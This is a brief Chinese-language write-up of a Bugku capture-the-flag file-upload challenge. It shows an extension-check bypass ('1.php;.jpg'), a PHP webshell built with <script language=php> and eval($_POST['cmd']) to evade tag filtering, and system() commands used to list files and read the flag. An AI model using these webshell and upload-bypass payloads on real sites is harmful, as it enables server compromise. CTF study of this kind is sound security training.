bugku ctf之文件上传2

打开题目链接http://47.93.190.246:49166/

看到file还有题目名就想包含一下，当然是尝试的flag.php，结果什么都没有，用php://filter试试发现作者已经过滤了

右键源码看到upload.php

上传文件名为1.php;.jpg，绕过检测，包含一下发现一句话的<?php?>这些字符被过滤，从其他文章处看到构造了<script language=php>@eval($_POST['cmd']);</script>菜刀连接被禁止了，又构造命令执行<acript language=php>system("ls")</script>，文件上传可以看到flag文件名,再构造<script language=php>system("cat flag..........txt")</script>上传得到flag